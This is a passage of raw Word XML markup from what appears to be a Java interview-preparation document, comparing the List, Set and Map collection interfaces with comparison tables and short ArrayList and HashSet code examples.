    <w:p w14:paraId="66B9C9F7"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086003F"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List interface are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC424F7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CAD46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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A441D86"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722D572F"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p w14:paraId="5076A2CB"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72501997"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Set interface are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F29984"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p w14:paraId="46F8008B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3339B90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p w14:paraId="487CF86C"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06" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5312C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7703A046"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1288AC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ACC56B6"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constant-time performance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (O(1)) for add, remove, and contains operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C273CE9"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maintain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07" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C99C987"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Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D52FD6"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798FEE2"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List can contain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and there can be multiple nulls in a list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376EB49"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42D186D"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et can contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at most one null element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. In a HashSet, for example, you can add </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>only one null</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and any attempts to add another null will be ignored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610EDD52"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08" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D76D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0D41C92"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2458F56B"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 List when you need to maintain the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elements or when you need to access elements by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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBBE53"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7914D55"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a Set when you need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eliminate duplicates</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or don't care about the order of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5088F9"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09" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B7022E"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CE4B95" w14:paraId="264FD719" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FDB97F2"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50129D" w:rsidRPr="00CE4B95" w14:paraId="5D761B0F" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FFB94D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duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="79B270AD" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16F9043D"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HashSet) or maintains insertion order (LinkedHashSet)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="68E105CB" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9985BF"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dex-based access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="0A75FF64" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BA81D8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TreeSet, LinkedHashSet</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="16B073C4" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BD356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at most one null element</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050129D" w:rsidRPr="00CE4B95" w14:paraId="76E35075" w14:textId="77777777" w:rsidTr="00FD4044">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A55DB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 fast add/remove (O(1))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="099289E0"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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C0031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42440D8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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C700E1"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8798A9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9C75877" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F99A63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48B90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38773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26421CB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154B1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923F8B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 // Duplicate element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3408B74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Banana, Apple]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6D01B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E826F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BCF3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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBA142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76A3F07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0A4CC5F9" w14:textId="77777777" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E53928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27296A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ECB30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set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659CD5C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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC2230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Banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC5FD4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 // Duplicate element will be ignored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C91BEA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Output: [Apple, Banana]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4B887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BF5D3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67662A" w14:textId="00A92630" w:rsidR="00FD4044" w:rsidRPr="00CE4B95" w:rsidRDefault="00FD4044" w:rsidP="0050129D">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C71DA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8C9FCBE"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llows duplicates, maintains order, and supports index-based access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F1D3C5"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4634C248" w14:textId="3693DE94" w:rsidR="00A52B66" w:rsidRPr="00CE4B95" w:rsidRDefault="00A52B66" w:rsidP="00A52B66">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc197867348"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between List and Map?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
    </w:p>
    <w:p w14:paraId="6DA2537E" w14:textId="20E4E237" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="0034424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List and Map are two core interfaces in the Java Collections Framework, and they have distinct characteristics. Here's a detailed comparison between them:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF06EB" w14:textId="77777777" w:rsidR="003D03A6" w:rsidRPr="00CE4B95" w:rsidRDefault="003D03A6" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076A01C9" w14:textId="2692980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08D33CFC"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st</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD75588"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 is an ordered collection (sequence) of elements that allows duplicate elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F90EE9"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and allows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y index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABDC59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ArrayList, LinkedList, Vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D519CCE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF93CBE"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is an object that maps keys to values. It does not allow duplicate keys but allows duplicate values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9BF77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llection of key-value pairs, where each key is unique, and each key is associated with exactly one value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C70D9FC"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HashMap, TreeMap, LinkedHashMap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30675EE8"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A857D">
          <v:rect id="_x0000_i1412" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B0B34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3966"/>
        <w:gridCol w:w="4972"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7F8F9AFB" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DD9E80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BA75AD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4E53CA95"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7F17B54C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="43397B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Elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F4D7C99"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individual elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AB1B91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key-value pairs (associates a key with a value).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="32FF179C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B93190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534C5B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 The same element can appear multiple times.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3490D31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duplicate keys</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, but values can be duplicated.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="1AEDB5B9" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F3997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F886FF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in most implementations).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="103D4E3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depends on the implementation (e.g., LinkedHashMap maintains insertion order, TreeMap sorts based on keys).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="40B86B85" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C6140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Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29FC83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llows random access using an index.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5749AE8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access the value using the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not by index).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="530F803B" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E01B34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248264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a singl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 (in some cases like ArrayList).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44F0559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except in Hashtable which disallows both).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="2E93A93B" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14B728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18B6BE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an ordered collection of elements, where duplicates are allowed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CB674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to associate a unique key with a value and retrieve data based on the key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="71D00FFA"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FF9E2">
          <v:rect id="_x0000_i1413" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5601D7F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496"/>
        <w:gridCol w:w="5001"/>
      </w:tblGrid>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="39FAA813" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1FC6F92C"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2F51C9AD"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6FB2D0A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5F7506C4" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="600EB6D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elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F89636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E element)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44B7EFB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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="549700FD" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="279176A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elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1280C7C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t index)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="717C9C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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="3CE68664" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="400DD86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6E34CAB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0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A52287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r>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="714D1280" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72BE703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elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EE499B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int index) or remove(Object o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E90A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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="7D6FA6AE" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34CBBAC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 element</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06CA1F8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Object o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1327EB0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or containsValue(Object value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00344244" w:rsidRPr="00CE4B95" w14:paraId="6B718A2C" w14:textId="77777777" w:rsidTr="00E737CC">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5A643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all elements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09C24C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c>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DF9990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r>
    </w:tbl>
    <w:p w14:paraId="7DCE9CF6"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21509">
          <v:rect id="_x0000_i1414" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A68879E"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 Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1727BB2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xample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A43794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9911FF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F833765" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F0E5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F94AD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DAF77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6C538F9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CB7FF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19CDD5C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88F1873" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74A9AF7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 list);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE6C1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lement at index 1: " + list.get(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20445BE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5BE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D8C5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05E47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 [Apple, Banana, Apple]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFB9E7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 at index 1: Banana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFAAC2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 Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ABDA5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68E42B0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145362EB" w14:textId="77777777" w:rsidR="00E737CC" w:rsidRPr="00CE4B95" w:rsidRDefault="00E737CC" w:rsidP="00344244">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
